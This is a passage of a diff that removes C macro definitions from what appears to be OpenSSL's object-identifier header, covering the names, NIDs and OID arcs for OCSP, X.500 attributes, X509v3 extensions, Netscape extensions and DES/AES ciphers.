-#define OBJ_id_cct_PKIData		OBJ_id_cct,2L
-
-#define SN_id_cct_PKIResponse		"id-cct-PKIResponse"
-#define NID_id_cct_PKIResponse		362
-#define OBJ_id_cct_PKIResponse		OBJ_id_cct,3L
-
-#define SN_id_ppl_anyLanguage		"id-ppl-anyLanguage"
-#define LN_id_ppl_anyLanguage		"Any language"
-#define NID_id_ppl_anyLanguage		664
-#define OBJ_id_ppl_anyLanguage		OBJ_id_ppl,0L
-
-#define SN_id_ppl_inheritAll		"id-ppl-inheritAll"
-#define LN_id_ppl_inheritAll		"Inherit all"
-#define NID_id_ppl_inheritAll		665
-#define OBJ_id_ppl_inheritAll		OBJ_id_ppl,1L
-
-#define SN_Independent		"id-ppl-independent"
-#define LN_Independent		"Independent"
-#define NID_Independent		667
-#define OBJ_Independent		OBJ_id_ppl,2L
-
-#define SN_ad_OCSP		"OCSP"
-#define LN_ad_OCSP		"OCSP"
-#define NID_ad_OCSP		178
-#define OBJ_ad_OCSP		OBJ_id_ad,1L
-
-#define SN_ad_ca_issuers		"caIssuers"
-#define LN_ad_ca_issuers		"CA Issuers"
-#define NID_ad_ca_issuers		179
-#define OBJ_ad_ca_issuers		OBJ_id_ad,2L
-
-#define SN_ad_timeStamping		"ad_timestamping"
-#define LN_ad_timeStamping		"AD Time Stamping"
-#define NID_ad_timeStamping		363
-#define OBJ_ad_timeStamping		OBJ_id_ad,3L
-
-#define SN_ad_dvcs		"AD_DVCS"
-#define LN_ad_dvcs		"ad dvcs"
-#define NID_ad_dvcs		364
-#define OBJ_ad_dvcs		OBJ_id_ad,4L
-
-#define SN_caRepository		"caRepository"
-#define LN_caRepository		"CA Repository"
-#define NID_caRepository		785
-#define OBJ_caRepository		OBJ_id_ad,5L
-
-#define OBJ_id_pkix_OCSP		OBJ_ad_OCSP
-
-#define SN_id_pkix_OCSP_basic		"basicOCSPResponse"
-#define LN_id_pkix_OCSP_basic		"Basic OCSP Response"
-#define NID_id_pkix_OCSP_basic		365
-#define OBJ_id_pkix_OCSP_basic		OBJ_id_pkix_OCSP,1L
-
-#define SN_id_pkix_OCSP_Nonce		"Nonce"
-#define LN_id_pkix_OCSP_Nonce		"OCSP Nonce"
-#define NID_id_pkix_OCSP_Nonce		366
-#define OBJ_id_pkix_OCSP_Nonce		OBJ_id_pkix_OCSP,2L
-
-#define SN_id_pkix_OCSP_CrlID		"CrlID"
-#define LN_id_pkix_OCSP_CrlID		"OCSP CRL ID"
-#define NID_id_pkix_OCSP_CrlID		367
-#define OBJ_id_pkix_OCSP_CrlID		OBJ_id_pkix_OCSP,3L
-
-#define SN_id_pkix_OCSP_acceptableResponses		"acceptableResponses"
-#define LN_id_pkix_OCSP_acceptableResponses		"Acceptable OCSP Responses"
-#define NID_id_pkix_OCSP_acceptableResponses		368
-#define OBJ_id_pkix_OCSP_acceptableResponses		OBJ_id_pkix_OCSP,4L
-
-#define SN_id_pkix_OCSP_noCheck		"noCheck"
-#define LN_id_pkix_OCSP_noCheck		"OCSP No Check"
-#define NID_id_pkix_OCSP_noCheck		369
-#define OBJ_id_pkix_OCSP_noCheck		OBJ_id_pkix_OCSP,5L
-
-#define SN_id_pkix_OCSP_archiveCutoff		"archiveCutoff"
-#define LN_id_pkix_OCSP_archiveCutoff		"OCSP Archive Cutoff"
-#define NID_id_pkix_OCSP_archiveCutoff		370
-#define OBJ_id_pkix_OCSP_archiveCutoff		OBJ_id_pkix_OCSP,6L
-
-#define SN_id_pkix_OCSP_serviceLocator		"serviceLocator"
-#define LN_id_pkix_OCSP_serviceLocator		"OCSP Service Locator"
-#define NID_id_pkix_OCSP_serviceLocator		371
-#define OBJ_id_pkix_OCSP_serviceLocator		OBJ_id_pkix_OCSP,7L
-
-#define SN_id_pkix_OCSP_extendedStatus		"extendedStatus"
-#define LN_id_pkix_OCSP_extendedStatus		"Extended OCSP Status"
-#define NID_id_pkix_OCSP_extendedStatus		372
-#define OBJ_id_pkix_OCSP_extendedStatus		OBJ_id_pkix_OCSP,8L
-
-#define SN_id_pkix_OCSP_valid		"valid"
-#define NID_id_pkix_OCSP_valid		373
-#define OBJ_id_pkix_OCSP_valid		OBJ_id_pkix_OCSP,9L
-
-#define SN_id_pkix_OCSP_path		"path"
-#define NID_id_pkix_OCSP_path		374
-#define OBJ_id_pkix_OCSP_path		OBJ_id_pkix_OCSP,10L
-
-#define SN_id_pkix_OCSP_trustRoot		"trustRoot"
-#define LN_id_pkix_OCSP_trustRoot		"Trust Root"
-#define NID_id_pkix_OCSP_trustRoot		375
-#define OBJ_id_pkix_OCSP_trustRoot		OBJ_id_pkix_OCSP,11L
-
-#define SN_algorithm		"algorithm"
-#define LN_algorithm		"algorithm"
-#define NID_algorithm		376
-#define OBJ_algorithm		1L,3L,14L,3L,2L
-
-#define SN_md5WithRSA		"RSA-NP-MD5"
-#define LN_md5WithRSA		"md5WithRSA"
-#define NID_md5WithRSA		104
-#define OBJ_md5WithRSA		OBJ_algorithm,3L
-
-#define SN_des_ecb		"DES-ECB"
-#define LN_des_ecb		"des-ecb"
-#define NID_des_ecb		29
-#define OBJ_des_ecb		OBJ_algorithm,6L
-
-#define SN_des_cbc		"DES-CBC"
-#define LN_des_cbc		"des-cbc"
-#define NID_des_cbc		31
-#define OBJ_des_cbc		OBJ_algorithm,7L
-
-#define SN_des_ofb64		"DES-OFB"
-#define LN_des_ofb64		"des-ofb"
-#define NID_des_ofb64		45
-#define OBJ_des_ofb64		OBJ_algorithm,8L
-
-#define SN_des_cfb64		"DES-CFB"
-#define LN_des_cfb64		"des-cfb"
-#define NID_des_cfb64		30
-#define OBJ_des_cfb64		OBJ_algorithm,9L
-
-#define SN_rsaSignature		"rsaSignature"
-#define NID_rsaSignature		377
-#define OBJ_rsaSignature		OBJ_algorithm,11L
-
-#define SN_dsa_2		"DSA-old"
-#define LN_dsa_2		"dsaEncryption-old"
-#define NID_dsa_2		67
-#define OBJ_dsa_2		OBJ_algorithm,12L
-
-#define SN_dsaWithSHA		"DSA-SHA"
-#define LN_dsaWithSHA		"dsaWithSHA"
-#define NID_dsaWithSHA		66
-#define OBJ_dsaWithSHA		OBJ_algorithm,13L
-
-#define SN_shaWithRSAEncryption		"RSA-SHA"
-#define LN_shaWithRSAEncryption		"shaWithRSAEncryption"
-#define NID_shaWithRSAEncryption		42
-#define OBJ_shaWithRSAEncryption		OBJ_algorithm,15L
-
-#define SN_des_ede_ecb		"DES-EDE"
-#define LN_des_ede_ecb		"des-ede"
-#define NID_des_ede_ecb		32
-#define OBJ_des_ede_ecb		OBJ_algorithm,17L
-
-#define SN_des_ede3_ecb		"DES-EDE3"
-#define LN_des_ede3_ecb		"des-ede3"
-#define NID_des_ede3_ecb		33
-
-#define SN_des_ede_cbc		"DES-EDE-CBC"
-#define LN_des_ede_cbc		"des-ede-cbc"
-#define NID_des_ede_cbc		43
-
-#define SN_des_ede_cfb64		"DES-EDE-CFB"
-#define LN_des_ede_cfb64		"des-ede-cfb"
-#define NID_des_ede_cfb64		60
-
-#define SN_des_ede3_cfb64		"DES-EDE3-CFB"
-#define LN_des_ede3_cfb64		"des-ede3-cfb"
-#define NID_des_ede3_cfb64		61
-
-#define SN_des_ede_ofb64		"DES-EDE-OFB"
-#define LN_des_ede_ofb64		"des-ede-ofb"
-#define NID_des_ede_ofb64		62
-
-#define SN_des_ede3_ofb64		"DES-EDE3-OFB"
-#define LN_des_ede3_ofb64		"des-ede3-ofb"
-#define NID_des_ede3_ofb64		63
-
-#define SN_desx_cbc		"DESX-CBC"
-#define LN_desx_cbc		"desx-cbc"
-#define NID_desx_cbc		80
-
-#define SN_sha		"SHA"
-#define LN_sha		"sha"
-#define NID_sha		41
-#define OBJ_sha		OBJ_algorithm,18L
-
-#define SN_sha1		"SHA1"
-#define LN_sha1		"sha1"
-#define NID_sha1		64
-#define OBJ_sha1		OBJ_algorithm,26L
-
-#define SN_dsaWithSHA1_2		"DSA-SHA1-old"
-#define LN_dsaWithSHA1_2		"dsaWithSHA1-old"
-#define NID_dsaWithSHA1_2		70
-#define OBJ_dsaWithSHA1_2		OBJ_algorithm,27L
-
-#define SN_sha1WithRSA		"RSA-SHA1-2"
-#define LN_sha1WithRSA		"sha1WithRSA"
-#define NID_sha1WithRSA		115
-#define OBJ_sha1WithRSA		OBJ_algorithm,29L
-
-#define SN_ripemd160		"RIPEMD160"
-#define LN_ripemd160		"ripemd160"
-#define NID_ripemd160		117
-#define OBJ_ripemd160		1L,3L,36L,3L,2L,1L
-
-#define SN_ripemd160WithRSA		"RSA-RIPEMD160"
-#define LN_ripemd160WithRSA		"ripemd160WithRSA"
-#define NID_ripemd160WithRSA		119
-#define OBJ_ripemd160WithRSA		1L,3L,36L,3L,3L,1L,2L
-
-#define SN_sxnet		"SXNetID"
-#define LN_sxnet		"Strong Extranet ID"
-#define NID_sxnet		143
-#define OBJ_sxnet		1L,3L,101L,1L,4L,1L
-
-#define SN_X500		"X500"
-#define LN_X500		"directory services (X.500)"
-#define NID_X500		11
-#define OBJ_X500		2L,5L
-
-#define SN_X509		"X509"
-#define NID_X509		12
-#define OBJ_X509		OBJ_X500,4L
-
-#define SN_commonName		"CN"
-#define LN_commonName		"commonName"
-#define NID_commonName		13
-#define OBJ_commonName		OBJ_X509,3L
-
-#define SN_surname		"SN"
-#define LN_surname		"surname"
-#define NID_surname		100
-#define OBJ_surname		OBJ_X509,4L
-
-#define LN_serialNumber		"serialNumber"
-#define NID_serialNumber		105
-#define OBJ_serialNumber		OBJ_X509,5L
-
-#define SN_countryName		"C"
-#define LN_countryName		"countryName"
-#define NID_countryName		14
-#define OBJ_countryName		OBJ_X509,6L
-
-#define SN_localityName		"L"
-#define LN_localityName		"localityName"
-#define NID_localityName		15
-#define OBJ_localityName		OBJ_X509,7L
-
-#define SN_stateOrProvinceName		"ST"
-#define LN_stateOrProvinceName		"stateOrProvinceName"
-#define NID_stateOrProvinceName		16
-#define OBJ_stateOrProvinceName		OBJ_X509,8L
-
-#define SN_streetAddress		"street"
-#define LN_streetAddress		"streetAddress"
-#define NID_streetAddress		660
-#define OBJ_streetAddress		OBJ_X509,9L
-
-#define SN_organizationName		"O"
-#define LN_organizationName		"organizationName"
-#define NID_organizationName		17
-#define OBJ_organizationName		OBJ_X509,10L
-
-#define SN_organizationalUnitName		"OU"
-#define LN_organizationalUnitName		"organizationalUnitName"
-#define NID_organizationalUnitName		18
-#define OBJ_organizationalUnitName		OBJ_X509,11L
-
-#define SN_title		"title"
-#define LN_title		"title"
-#define NID_title		106
-#define OBJ_title		OBJ_X509,12L
-
-#define LN_description		"description"
-#define NID_description		107
-#define OBJ_description		OBJ_X509,13L
-
-#define LN_searchGuide		"searchGuide"
-#define NID_searchGuide		859
-#define OBJ_searchGuide		OBJ_X509,14L
-
-#define LN_businessCategory		"businessCategory"
-#define NID_businessCategory		860
-#define OBJ_businessCategory		OBJ_X509,15L
-
-#define LN_postalAddress		"postalAddress"
-#define NID_postalAddress		861
-#define OBJ_postalAddress		OBJ_X509,16L
-
-#define LN_postalCode		"postalCode"
-#define NID_postalCode		661
-#define OBJ_postalCode		OBJ_X509,17L
-
-#define LN_postOfficeBox		"postOfficeBox"
-#define NID_postOfficeBox		862
-#define OBJ_postOfficeBox		OBJ_X509,18L
-
-#define LN_physicalDeliveryOfficeName		"physicalDeliveryOfficeName"
-#define NID_physicalDeliveryOfficeName		863
-#define OBJ_physicalDeliveryOfficeName		OBJ_X509,19L
-
-#define LN_telephoneNumber		"telephoneNumber"
-#define NID_telephoneNumber		864
-#define OBJ_telephoneNumber		OBJ_X509,20L
-
-#define LN_telexNumber		"telexNumber"
-#define NID_telexNumber		865
-#define OBJ_telexNumber		OBJ_X509,21L
-
-#define LN_teletexTerminalIdentifier		"teletexTerminalIdentifier"
-#define NID_teletexTerminalIdentifier		866
-#define OBJ_teletexTerminalIdentifier		OBJ_X509,22L
-
-#define LN_facsimileTelephoneNumber		"facsimileTelephoneNumber"
-#define NID_facsimileTelephoneNumber		867
-#define OBJ_facsimileTelephoneNumber		OBJ_X509,23L
-
-#define LN_x121Address		"x121Address"
-#define NID_x121Address		868
-#define OBJ_x121Address		OBJ_X509,24L
-
-#define LN_internationaliSDNNumber		"internationaliSDNNumber"
-#define NID_internationaliSDNNumber		869
-#define OBJ_internationaliSDNNumber		OBJ_X509,25L
-
-#define LN_registeredAddress		"registeredAddress"
-#define NID_registeredAddress		870
-#define OBJ_registeredAddress		OBJ_X509,26L
-
-#define LN_destinationIndicator		"destinationIndicator"
-#define NID_destinationIndicator		871
-#define OBJ_destinationIndicator		OBJ_X509,27L
-
-#define LN_preferredDeliveryMethod		"preferredDeliveryMethod"
-#define NID_preferredDeliveryMethod		872
-#define OBJ_preferredDeliveryMethod		OBJ_X509,28L
-
-#define LN_presentationAddress		"presentationAddress"
-#define NID_presentationAddress		873
-#define OBJ_presentationAddress		OBJ_X509,29L
-
-#define LN_supportedApplicationContext		"supportedApplicationContext"
-#define NID_supportedApplicationContext		874
-#define OBJ_supportedApplicationContext		OBJ_X509,30L
-
-#define SN_member		"member"
-#define NID_member		875
-#define OBJ_member		OBJ_X509,31L
-
-#define SN_owner		"owner"
-#define NID_owner		876
-#define OBJ_owner		OBJ_X509,32L
-
-#define LN_roleOccupant		"roleOccupant"
-#define NID_roleOccupant		877
-#define OBJ_roleOccupant		OBJ_X509,33L
-
-#define SN_seeAlso		"seeAlso"
-#define NID_seeAlso		878
-#define OBJ_seeAlso		OBJ_X509,34L
-
-#define LN_userPassword		"userPassword"
-#define NID_userPassword		879
-#define OBJ_userPassword		OBJ_X509,35L
-
-#define LN_userCertificate		"userCertificate"
-#define NID_userCertificate		880
-#define OBJ_userCertificate		OBJ_X509,36L
-
-#define LN_cACertificate		"cACertificate"
-#define NID_cACertificate		881
-#define OBJ_cACertificate		OBJ_X509,37L
-
-#define LN_authorityRevocationList		"authorityRevocationList"
-#define NID_authorityRevocationList		882
-#define OBJ_authorityRevocationList		OBJ_X509,38L
-
-#define LN_certificateRevocationList		"certificateRevocationList"
-#define NID_certificateRevocationList		883
-#define OBJ_certificateRevocationList		OBJ_X509,39L
-
-#define LN_crossCertificatePair		"crossCertificatePair"
-#define NID_crossCertificatePair		884
-#define OBJ_crossCertificatePair		OBJ_X509,40L
-
-#define SN_name		"name"
-#define LN_name		"name"
-#define NID_name		173
-#define OBJ_name		OBJ_X509,41L
-
-#define SN_givenName		"GN"
-#define LN_givenName		"givenName"
-#define NID_givenName		99
-#define OBJ_givenName		OBJ_X509,42L
-
-#define SN_initials		"initials"
-#define LN_initials		"initials"
-#define NID_initials		101
-#define OBJ_initials		OBJ_X509,43L
-
-#define LN_generationQualifier		"generationQualifier"
-#define NID_generationQualifier		509
-#define OBJ_generationQualifier		OBJ_X509,44L
-
-#define LN_x500UniqueIdentifier		"x500UniqueIdentifier"
-#define NID_x500UniqueIdentifier		503
-#define OBJ_x500UniqueIdentifier		OBJ_X509,45L
-
-#define SN_dnQualifier		"dnQualifier"
-#define LN_dnQualifier		"dnQualifier"
-#define NID_dnQualifier		174
-#define OBJ_dnQualifier		OBJ_X509,46L
-
-#define LN_enhancedSearchGuide		"enhancedSearchGuide"
-#define NID_enhancedSearchGuide		885
-#define OBJ_enhancedSearchGuide		OBJ_X509,47L
-
-#define LN_protocolInformation		"protocolInformation"
-#define NID_protocolInformation		886
-#define OBJ_protocolInformation		OBJ_X509,48L
-
-#define LN_distinguishedName		"distinguishedName"
-#define NID_distinguishedName		887
-#define OBJ_distinguishedName		OBJ_X509,49L
-
-#define LN_uniqueMember		"uniqueMember"
-#define NID_uniqueMember		888
-#define OBJ_uniqueMember		OBJ_X509,50L
-
-#define LN_houseIdentifier		"houseIdentifier"
-#define NID_houseIdentifier		889
-#define OBJ_houseIdentifier		OBJ_X509,51L
-
-#define LN_supportedAlgorithms		"supportedAlgorithms"
-#define NID_supportedAlgorithms		890
-#define OBJ_supportedAlgorithms		OBJ_X509,52L
-
-#define LN_deltaRevocationList		"deltaRevocationList"
-#define NID_deltaRevocationList		891
-#define OBJ_deltaRevocationList		OBJ_X509,53L
-
-#define SN_dmdName		"dmdName"
-#define NID_dmdName		892
-#define OBJ_dmdName		OBJ_X509,54L
-
-#define LN_pseudonym		"pseudonym"
-#define NID_pseudonym		510
-#define OBJ_pseudonym		OBJ_X509,65L
-
-#define SN_role		"role"
-#define LN_role		"role"
-#define NID_role		400
-#define OBJ_role		OBJ_X509,72L
-
-#define SN_X500algorithms		"X500algorithms"
-#define LN_X500algorithms		"directory services - algorithms"
-#define NID_X500algorithms		378
-#define OBJ_X500algorithms		OBJ_X500,8L
-
-#define SN_rsa		"RSA"
-#define LN_rsa		"rsa"
-#define NID_rsa		19
-#define OBJ_rsa		OBJ_X500algorithms,1L,1L
-
-#define SN_mdc2WithRSA		"RSA-MDC2"
-#define LN_mdc2WithRSA		"mdc2WithRSA"
-#define NID_mdc2WithRSA		96
-#define OBJ_mdc2WithRSA		OBJ_X500algorithms,3L,100L
-
-#define SN_mdc2		"MDC2"
-#define LN_mdc2		"mdc2"
-#define NID_mdc2		95
-#define OBJ_mdc2		OBJ_X500algorithms,3L,101L
-
-#define SN_id_ce		"id-ce"
-#define NID_id_ce		81
-#define OBJ_id_ce		OBJ_X500,29L
-
-#define SN_subject_directory_attributes		"subjectDirectoryAttributes"
-#define LN_subject_directory_attributes		"X509v3 Subject Directory Attributes"
-#define NID_subject_directory_attributes		769
-#define OBJ_subject_directory_attributes		OBJ_id_ce,9L
-
-#define SN_subject_key_identifier		"subjectKeyIdentifier"
-#define LN_subject_key_identifier		"X509v3 Subject Key Identifier"
-#define NID_subject_key_identifier		82
-#define OBJ_subject_key_identifier		OBJ_id_ce,14L
-
-#define SN_key_usage		"keyUsage"
-#define LN_key_usage		"X509v3 Key Usage"
-#define NID_key_usage		83
-#define OBJ_key_usage		OBJ_id_ce,15L
-
-#define SN_private_key_usage_period		"privateKeyUsagePeriod"
-#define LN_private_key_usage_period		"X509v3 Private Key Usage Period"
-#define NID_private_key_usage_period		84
-#define OBJ_private_key_usage_period		OBJ_id_ce,16L
-
-#define SN_subject_alt_name		"subjectAltName"
-#define LN_subject_alt_name		"X509v3 Subject Alternative Name"
-#define NID_subject_alt_name		85
-#define OBJ_subject_alt_name		OBJ_id_ce,17L
-
-#define SN_issuer_alt_name		"issuerAltName"
-#define LN_issuer_alt_name		"X509v3 Issuer Alternative Name"
-#define NID_issuer_alt_name		86
-#define OBJ_issuer_alt_name		OBJ_id_ce,18L
-
-#define SN_basic_constraints		"basicConstraints"
-#define LN_basic_constraints		"X509v3 Basic Constraints"
-#define NID_basic_constraints		87
-#define OBJ_basic_constraints		OBJ_id_ce,19L
-
-#define SN_crl_number		"crlNumber"
-#define LN_crl_number		"X509v3 CRL Number"
-#define NID_crl_number		88
-#define OBJ_crl_number		OBJ_id_ce,20L
-
-#define SN_crl_reason		"CRLReason"
-#define LN_crl_reason		"X509v3 CRL Reason Code"
-#define NID_crl_reason		141
-#define OBJ_crl_reason		OBJ_id_ce,21L
-
-#define SN_invalidity_date		"invalidityDate"
-#define LN_invalidity_date		"Invalidity Date"
-#define NID_invalidity_date		142
-#define OBJ_invalidity_date		OBJ_id_ce,24L
-
-#define SN_delta_crl		"deltaCRL"
-#define LN_delta_crl		"X509v3 Delta CRL Indicator"
-#define NID_delta_crl		140
-#define OBJ_delta_crl		OBJ_id_ce,27L
-
-#define SN_issuing_distribution_point		"issuingDistributionPoint"
-#define LN_issuing_distribution_point		"X509v3 Issuing Distribution Point"
-#define NID_issuing_distribution_point		770
-#define OBJ_issuing_distribution_point		OBJ_id_ce,28L
-
-#define SN_certificate_issuer		"certificateIssuer"
-#define LN_certificate_issuer		"X509v3 Certificate Issuer"
-#define NID_certificate_issuer		771
-#define OBJ_certificate_issuer		OBJ_id_ce,29L
-
-#define SN_name_constraints		"nameConstraints"
-#define LN_name_constraints		"X509v3 Name Constraints"
-#define NID_name_constraints		666
-#define OBJ_name_constraints		OBJ_id_ce,30L
-
-#define SN_crl_distribution_points		"crlDistributionPoints"
-#define LN_crl_distribution_points		"X509v3 CRL Distribution Points"
-#define NID_crl_distribution_points		103
-#define OBJ_crl_distribution_points		OBJ_id_ce,31L
-
-#define SN_certificate_policies		"certificatePolicies"
-#define LN_certificate_policies		"X509v3 Certificate Policies"
-#define NID_certificate_policies		89
-#define OBJ_certificate_policies		OBJ_id_ce,32L
-
-#define SN_any_policy		"anyPolicy"
-#define LN_any_policy		"X509v3 Any Policy"
-#define NID_any_policy		746
-#define OBJ_any_policy		OBJ_certificate_policies,0L
-
-#define SN_policy_mappings		"policyMappings"
-#define LN_policy_mappings		"X509v3 Policy Mappings"
-#define NID_policy_mappings		747
-#define OBJ_policy_mappings		OBJ_id_ce,33L
-
-#define SN_authority_key_identifier		"authorityKeyIdentifier"
-#define LN_authority_key_identifier		"X509v3 Authority Key Identifier"
-#define NID_authority_key_identifier		90
-#define OBJ_authority_key_identifier		OBJ_id_ce,35L
-
-#define SN_policy_constraints		"policyConstraints"
-#define LN_policy_constraints		"X509v3 Policy Constraints"
-#define NID_policy_constraints		401
-#define OBJ_policy_constraints		OBJ_id_ce,36L
-
-#define SN_ext_key_usage		"extendedKeyUsage"
-#define LN_ext_key_usage		"X509v3 Extended Key Usage"
-#define NID_ext_key_usage		126
-#define OBJ_ext_key_usage		OBJ_id_ce,37L
-
-#define SN_freshest_crl		"freshestCRL"
-#define LN_freshest_crl		"X509v3 Freshest CRL"
-#define NID_freshest_crl		857
-#define OBJ_freshest_crl		OBJ_id_ce,46L
-
-#define SN_inhibit_any_policy		"inhibitAnyPolicy"
-#define LN_inhibit_any_policy		"X509v3 Inhibit Any Policy"
-#define NID_inhibit_any_policy		748
-#define OBJ_inhibit_any_policy		OBJ_id_ce,54L
-
-#define SN_target_information		"targetInformation"
-#define LN_target_information		"X509v3 AC Targeting"
-#define NID_target_information		402
-#define OBJ_target_information		OBJ_id_ce,55L
-
-#define SN_no_rev_avail		"noRevAvail"
-#define LN_no_rev_avail		"X509v3 No Revocation Available"
-#define NID_no_rev_avail		403
-#define OBJ_no_rev_avail		OBJ_id_ce,56L
-
-#define SN_anyExtendedKeyUsage		"anyExtendedKeyUsage"
-#define LN_anyExtendedKeyUsage		"Any Extended Key Usage"
-#define NID_anyExtendedKeyUsage		910
-#define OBJ_anyExtendedKeyUsage		OBJ_ext_key_usage,0L
-
-#define SN_netscape		"Netscape"
-#define LN_netscape		"Netscape Communications Corp."
-#define NID_netscape		57
-#define OBJ_netscape		2L,16L,840L,1L,113730L
-
-#define SN_netscape_cert_extension		"nsCertExt"
-#define LN_netscape_cert_extension		"Netscape Certificate Extension"
-#define NID_netscape_cert_extension		58
-#define OBJ_netscape_cert_extension		OBJ_netscape,1L
-
-#define SN_netscape_data_type		"nsDataType"
-#define LN_netscape_data_type		"Netscape Data Type"
-#define NID_netscape_data_type		59
-#define OBJ_netscape_data_type		OBJ_netscape,2L
-
-#define SN_netscape_cert_type		"nsCertType"
-#define LN_netscape_cert_type		"Netscape Cert Type"
-#define NID_netscape_cert_type		71
-#define OBJ_netscape_cert_type		OBJ_netscape_cert_extension,1L
-
-#define SN_netscape_base_url		"nsBaseUrl"
-#define LN_netscape_base_url		"Netscape Base Url"
-#define NID_netscape_base_url		72
-#define OBJ_netscape_base_url		OBJ_netscape_cert_extension,2L
-
-#define SN_netscape_revocation_url		"nsRevocationUrl"
-#define LN_netscape_revocation_url		"Netscape Revocation Url"
-#define NID_netscape_revocation_url		73
-#define OBJ_netscape_revocation_url		OBJ_netscape_cert_extension,3L
-
-#define SN_netscape_ca_revocation_url		"nsCaRevocationUrl"
-#define LN_netscape_ca_revocation_url		"Netscape CA Revocation Url"
-#define NID_netscape_ca_revocation_url		74
-#define OBJ_netscape_ca_revocation_url		OBJ_netscape_cert_extension,4L
-
-#define SN_netscape_renewal_url		"nsRenewalUrl"
-#define LN_netscape_renewal_url		"Netscape Renewal Url"
-#define NID_netscape_renewal_url		75
-#define OBJ_netscape_renewal_url		OBJ_netscape_cert_extension,7L
-
-#define SN_netscape_ca_policy_url		"nsCaPolicyUrl"
-#define LN_netscape_ca_policy_url		"Netscape CA Policy Url"
-#define NID_netscape_ca_policy_url		76
-#define OBJ_netscape_ca_policy_url		OBJ_netscape_cert_extension,8L
-
-#define SN_netscape_ssl_server_name		"nsSslServerName"
-#define LN_netscape_ssl_server_name		"Netscape SSL Server Name"
-#define NID_netscape_ssl_server_name		77
-#define OBJ_netscape_ssl_server_name		OBJ_netscape_cert_extension,12L
-
-#define SN_netscape_comment		"nsComment"
-#define LN_netscape_comment		"Netscape Comment"
-#define NID_netscape_comment		78
-#define OBJ_netscape_comment		OBJ_netscape_cert_extension,13L
-
-#define SN_netscape_cert_sequence		"nsCertSequence"
-#define LN_netscape_cert_sequence		"Netscape Certificate Sequence"
-#define NID_netscape_cert_sequence		79
-#define OBJ_netscape_cert_sequence		OBJ_netscape_data_type,5L
-
-#define SN_ns_sgc		"nsSGC"
-#define LN_ns_sgc		"Netscape Server Gated Crypto"
-#define NID_ns_sgc		139
-#define OBJ_ns_sgc		OBJ_netscape,4L,1L
-
-#define SN_org		"ORG"
-#define LN_org		"org"
-#define NID_org		379
-#define OBJ_org		OBJ_iso,3L
-
-#define SN_dod		"DOD"
-#define LN_dod		"dod"
-#define NID_dod		380
-#define OBJ_dod		OBJ_org,6L
-
-#define SN_iana		"IANA"
-#define LN_iana		"iana"
-#define NID_iana		381
-#define OBJ_iana		OBJ_dod,1L
-
-#define OBJ_internet		OBJ_iana
-
-#define SN_Directory		"directory"
-#define LN_Directory		"Directory"
-#define NID_Directory		382
-#define OBJ_Directory		OBJ_internet,1L
-
-#define SN_Management		"mgmt"
-#define LN_Management		"Management"
-#define NID_Management		383
-#define OBJ_Management		OBJ_internet,2L
-
-#define SN_Experimental		"experimental"
-#define LN_Experimental		"Experimental"
-#define NID_Experimental		384
-#define OBJ_Experimental		OBJ_internet,3L
-
-#define SN_Private		"private"
-#define LN_Private		"Private"
-#define NID_Private		385
-#define OBJ_Private		OBJ_internet,4L
-
-#define SN_Security		"security"
-#define LN_Security		"Security"
-#define NID_Security		386
-#define OBJ_Security		OBJ_internet,5L
-
-#define SN_SNMPv2		"snmpv2"
-#define LN_SNMPv2		"SNMPv2"
-#define NID_SNMPv2		387
-#define OBJ_SNMPv2		OBJ_internet,6L
-
-#define LN_Mail		"Mail"
-#define NID_Mail		388
-#define OBJ_Mail		OBJ_internet,7L
-
-#define SN_Enterprises		"enterprises"
-#define LN_Enterprises		"Enterprises"
-#define NID_Enterprises		389
-#define OBJ_Enterprises		OBJ_Private,1L
-
-#define SN_dcObject		"dcobject"
-#define LN_dcObject		"dcObject"
-#define NID_dcObject		390
-#define OBJ_dcObject		OBJ_Enterprises,1466L,344L
-
-#define OBJ_extendedValidation		OBJ_Enterprises,311L,60L
-
-#define LN_jurisdictionLocalityName		"jurisdictionLocalityName"
-#define NID_jurisdictionLocalityName		956
-#define OBJ_jurisdictionLocalityName		OBJ_extendedValidation,2L,1L,1L
-
-#define LN_jurisdictionStateOrProvinceName		"jurisdictionStateOrProvinceName"
-#define NID_jurisdictionStateOrProvinceName		957
-#define OBJ_jurisdictionStateOrProvinceName		OBJ_extendedValidation,2L,1L,2L
-
-#define LN_jurisdictionCountryName		"jurisdictionCountryName"
-#define NID_jurisdictionCountryName		958
-#define OBJ_jurisdictionCountryName		OBJ_extendedValidation,2L,1L,3L
-
-#define SN_mime_mhs		"mime-mhs"
-#define LN_mime_mhs		"MIME MHS"
-#define NID_mime_mhs		504
-#define OBJ_mime_mhs		OBJ_Mail,1L
-
-#define SN_mime_mhs_headings		"mime-mhs-headings"
-#define LN_mime_mhs_headings		"mime-mhs-headings"
-#define NID_mime_mhs_headings		505
-#define OBJ_mime_mhs_headings		OBJ_mime_mhs,1L
-
-#define SN_mime_mhs_bodies		"mime-mhs-bodies"
-#define LN_mime_mhs_bodies		"mime-mhs-bodies"
-#define NID_mime_mhs_bodies		506
-#define OBJ_mime_mhs_bodies		OBJ_mime_mhs,2L
-
-#define SN_id_hex_partial_message		"id-hex-partial-message"
-#define LN_id_hex_partial_message		"id-hex-partial-message"
-#define NID_id_hex_partial_message		507
-#define OBJ_id_hex_partial_message		OBJ_mime_mhs_headings,1L
-
-#define SN_id_hex_multipart_message		"id-hex-multipart-message"
-#define LN_id_hex_multipart_message		"id-hex-multipart-message"
-#define NID_id_hex_multipart_message		508
-#define OBJ_id_hex_multipart_message		OBJ_mime_mhs_headings,2L
-
-#define SN_rle_compression		"RLE"
-#define LN_rle_compression		"run length compression"
-#define NID_rle_compression		124
-#define OBJ_rle_compression		1L,1L,1L,1L,666L,1L
-
-#define SN_zlib_compression		"ZLIB"
-#define LN_zlib_compression		"zlib compression"
-#define NID_zlib_compression		125
-#define OBJ_zlib_compression		OBJ_id_smime_alg,8L
-
-#define OBJ_csor		2L,16L,840L,1L,101L,3L
-
-#define OBJ_nistAlgorithms		OBJ_csor,4L
-
-#define OBJ_aes		OBJ_nistAlgorithms,1L
-
-#define SN_aes_128_ecb		"AES-128-ECB"
-#define LN_aes_128_ecb		"aes-128-ecb"
-#define NID_aes_128_ecb		418
-#define OBJ_aes_128_ecb		OBJ_aes,1L
-
-#define SN_aes_128_cbc		"AES-128-CBC"
-#define LN_aes_128_cbc		"aes-128-cbc"
-#define NID_aes_128_cbc		419
-#define OBJ_aes_128_cbc		OBJ_aes,2L
-
-#define SN_aes_128_ofb128		"AES-128-OFB"
-#define LN_aes_128_ofb128		"aes-128-ofb"
-#define NID_aes_128_ofb128		420
-#define OBJ_aes_128_ofb128		OBJ_aes,3L
-
